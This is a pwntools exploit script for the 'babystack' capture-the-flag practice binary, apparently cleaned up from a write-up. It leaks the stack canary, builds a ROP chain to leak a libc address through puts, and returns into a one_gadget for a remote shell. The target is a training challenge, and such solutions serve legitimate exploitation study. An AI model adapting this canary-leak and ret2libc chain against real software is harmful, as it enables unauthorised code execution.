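# "babystack" write-up exploit (BUUCTF practice target, as given in the post:
# node3.buuoj.cn:29422).  Screenshots referenced by the original post:
#   /images/20230209/c62f4ff4694e441b881baec34db04f7e.png
#   /images/20230209/3fec429aaab84550a9f23e2451f1ac48.png
#   /images/20230209/5a049f54b43741029b0df202ed00b338.png
from pwn import *
from LibcSearcher import LibcSearcher

context.log_level = 'debug'

PROC_NAME = './babystack'
# The post started a local process() and then immediately rebound `p` to the
# remote connection, leaking the child; choose one transport explicitly.
LOCAL = False


def debug_pause():
    """Log the pid of the local target and block until a debugger is attached."""
    log.info(proc.pidof(p))
    pause()


def store(content):
    """Select menu item 1 and send *content* (bytes) as the data to store."""
    p.sendlineafter('>> ', str(1))
    p.send(content)


def show_buffer():
    """Select menu item 2; the script reads the stored data back afterwards."""
    # Renamed from the post's `print()`, which shadowed the builtin.
    p.sendlineafter('>> ', str(2))


def exit_prog():
    """Select menu item 3; the script expects the overflowed return path to run next."""
    # Renamed from the post's `quit()`, which shadowed the site builtin.
    p.sendlineafter('>> ', str(3))


p = process(PROC_NAME) if LOCAL else remote('node3.buuoj.cn', 29422)
elf = ELF(PROC_NAME)
write_got = elf.got['write']
puts_plt = elf.plt['puts']

# Stage 1: canary leak.  Fill the buffer up to and including the lowest byte
# of the canary (0x90 - 8 is the offset used before p64(canary) below); the
# 0x61 ('a') that landed in that byte is subtracted back out.
store(b'a' * (0x90 - 0x8 + 0x1))
show_buffer()
canary = u64(p.recv(0x90)[-8:]) - 0x61
log.info(hex(canary))

# Stage 2: leak write@got through puts, then return to main for a second pass.
# Gadget and main addresses are the fixed values the post uses for this binary.
pop_rdi = 0x400a93
main_addr = 0x400908
payload = (
    b'a' * (0x90 - 0x8)
    + p64(canary)
    + p64(0)            # presumably the saved-rbp slot; value is unused
    + p64(pop_rdi)
    + p64(write_got)
    + p64(puts_plt)
    + p64(main_addr)
)
store(payload)
exit_prog()
# NOTE(review): an unbounded recv() can return more than 8 bytes, which u64()
# rejects; the post's alternative was `p.recv(0x33)[-6:].ljust(8, b'\x00')`.
write_addr = u64(p.recv().ljust(0x8, b'\x00'))
log.info(hex(write_addr))
# debug_pause()

# Stage 3: resolve libc from the leak and return into the post's one_gadget.
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
one_gadget = libc_base + 0xf1147  # offset from the post; verify against the matched libc
payload1 = b'a' * (0x90 - 0x8) + p64(canary) + p64(0x0) + p64(one_gadget)
store(payload1)
exit_prog()
p.interactive()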